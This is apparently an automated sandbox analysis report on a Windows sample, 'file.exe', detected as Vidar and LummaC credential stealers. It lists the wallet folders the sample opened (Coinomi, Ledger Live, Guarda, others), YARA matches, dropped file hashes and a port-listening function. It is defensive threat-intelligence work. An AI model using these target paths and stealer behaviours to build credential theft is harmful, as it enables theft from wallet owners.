Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0C40 sqlite3_bind_zeroblob,	2_2_6C2B0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0D60 sqlite3_bind_parameter_name,	2_2_6C2B0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D8EA0 sqlite3_clear_bindings,	2_2_6C1D8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6C2B0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D6410 bind,WSAGetLastError,	2_2_6C1D6410

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1501434
Product:	CloudBasic
Start time:	22:51:05
Start date:	29.08.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	5095864caf019967467c5714897ee419
SHA1:	17e649d5784db18d790c77bdd300b9ff73dbf5ea
SHA256:	26047c08e200668e57088cb5b9577ed7975bf6309db51fe3544c54878430e8a3
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\JDGHIIJKEBGI\JJDHID	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\JJECFIECBGDG\AFBAFB	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\JJECFIECBGDG\AKFIDH	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\JJECFIECBGDG\BGIJJK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\JJECFIECBGDG\EBKJDB	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\JJECFIECBGDG\EBKJDB-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\JJECFIECBGDG\FHJDAA	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\JJECFIECBGDG\FIIIIJ	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2	A2D1F4CF66465F9F0CAC61C4A95C7EDE	BA6A845E247B221AAEC96C4213E1FD3744B10A27	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
C:\ProgramData\JJECFIECBGDG\GHJKJD	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\JJECFIECBGDG\IDBAKK	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\JJECFIECBGDG\IDBAKK-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\JJECFIECBGDG\IIJKJD	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\JJECFIECBGDG\JEGHJD	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\KJKJJJECFI.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	70567FAE269796BF407322D0A4435054	E11EDDF4F0CE6D5288D8187005D34EEE6EFBA046	5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
C:\ProgramData\KKJEBAAECB.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	087F21847D13D50158683C834471728C	6E0CAF480014EB6239CBE757F9A75E4B5594AE69	353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_5c39e2f0624fb3ace2547e2d794ca76a89c913_e446d4ea_8ef2c652-2fc0-456d-9a6d-6ec7b8425150\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	8747A01E2167C01C12BBD6630C1DBAAD	4AB9E14BA0C0CC0DB0E486F9BEEBBE84E20BDFE6	8CA8F3561CABE6684A2A43858ADB9203AB9C8F8D4F65B289EC4DE378A7E48F56
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EFE.tmp.dmp	Mini DuMP crash report, 15 streams, Thu Aug 29 20:52:40 2024, 0x1205a4 type	0D674B5204E7695762CF9D53A51D07B7	284AAF452826C5B48F2EF2DAB7BE658461B8F0C2	0430BB3241C06056398444EA29E58C8F2557E6AF8690CEBDBC6BFE8A6254B58D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7067.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	8AFF83FDC215DB329BE3429D72EE1EC3	2595D98EE202E1DABA6BDC6DB2349B8578A4C862	0A05C0280C16B99929F482FF542142B3FC78CA4BF05C4176B75ED9F4982318CD
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7087.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F80C10F8D4A0ACDDCEC944F8FB4EF793	F057BF7D0FB673F32CEC02CDDDC26A2E7FA64B2D	8632020086A717E73274361B046274DE0585C2C25DC7F6FBB80BF99423B22DAF
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KJKJJJECFI.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KKJEBAAECB.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	087F21847D13D50158683C834471728C	6E0CAF480014EB6239CBE757F9A75E4B5594AE69	353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	70567FAE269796BF407322D0A4435054	E11EDDF4F0CE6D5288D8187005D34EEE6EFBA046	5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Temp\delays.tmp	ASCII text, with very long lines (65536), with no line terminators	FBF27F9317DC1176120307BB038058D4	D2D7E774D5708413233C6A443DDBDBC7342BC8FC	1DD5F819C51102C605936DB6074109F74FA293DE9C45FF3570F3E3BE5A880172
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	5911C8EBDBBC2016DCB80F185C29A0EE	DC1BB489B175990634325DBA7B2361E10BB1E09D	CF69D0A1A06B82E2B61F03700FD1DA1A5A332A467035AA897A2F0C09A7057C31

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by